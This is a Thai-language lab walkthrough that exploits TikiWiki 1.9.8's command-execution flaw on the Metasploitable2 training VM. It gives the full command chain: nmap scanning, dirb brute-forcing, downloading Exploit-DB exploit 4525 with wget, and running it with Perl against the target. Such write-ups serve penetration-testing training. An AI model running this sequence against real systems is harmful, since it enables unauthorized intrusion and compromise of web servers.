How to exploit TikiWiki (<= 1.9.8) 'tiki-graph_formula.php' Command Execution - Metasploitable2

บทนำ (Overview)

บทความนี้กล่าวถึงการค้นหาช่องโหว่และวิธีการยึดช่องโหว่ของเว็บไซต์ “Tikiwiki” โดยเริ่มจากการพยายามหา “port” บริการที่เปิด “port” หมายเลข “80” จากนั้นเริ่มค้น “directory” ที่หน้าจะเกี่ยวข้องกับเว็บไซต์นั้น ๆ เพื่อหา “version” ที่เป็นไปได้ ต่อมาเมื่อทราบ “version” ก็จะหาช่องโหว่ที่เกี่ยวข้อง  และหาเครื่องมือสำหรับยึดช่องโหว่นั้น ๆ

ขั้นตอน (Steps)

  1. ค้นหา “Port” ที่เปิดบริการโดยใช้คำสั่งดังนี้
    nmap -p 1-65535 -T4 -A -v 192.168.1.36
    
  2. ตรวจสอบ “Port”  ที่เปิดบริการ “Web” ทั้ง “80” และ “443”
    80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
    |_http-title: Metasploitable2 - Linux
    
  3. ทดลองเข้าถึงหน้าเว็บไซต์ แล้วตรวจสอบว่าสามารถพบชื่อ “Web application” หรือ Version อะไรเพิ่มหรือไม่metasploitable-tikiwiki-01
  4. ทดลองใช้ “Dir-buster” เพื่อตรวจสอบ “Path” อื่น ๆ เพื่มเติม
    #เราใช้ option -r โดยไม่ต้องหา sub directory
    dirb http://192.168.1.36 /usr/share/wordlists/dirb/big.txt -r
    

    metasploitable-tikiwiki-02

  5. จากตัวอย่างทดลองเข้า path ที่เจอ http://192.168.1.36/tikiwiki/ metasploitable-tikiwiki-03
  6. จากรูปข้างเป็นปัญหา TIKIWIKI ไม่สามารถเชื่อมต่อฐานข้อมูล ให้ตั้งค่าตามบทความ How to set Tikiwiki – Metasploitable2
  7. เมื่อได้ “version” แล้วทดลองค้นช่องโหว่โดยใช้คำค้นดังนี้
    search exploit tikiwiki 1.9
    

    metasploitable-tikiwiki-04

  8. ทดลองดาวน์โหลด “Exploit” ดังนี้
    cd /root/Desktop
    wget --no-check-certificate  http://www.exploit-db.com/download/4525 -O exploit-4525.pl
    

    metasploitable-tikiwiki-05

  9. ใช้งาน “exploit” ดังนี้
    perl exploit-4525.pl http://192.168.1.36/tikiwiki
    

    metasploitable-tikiwiki-06

ใส่ความเห็น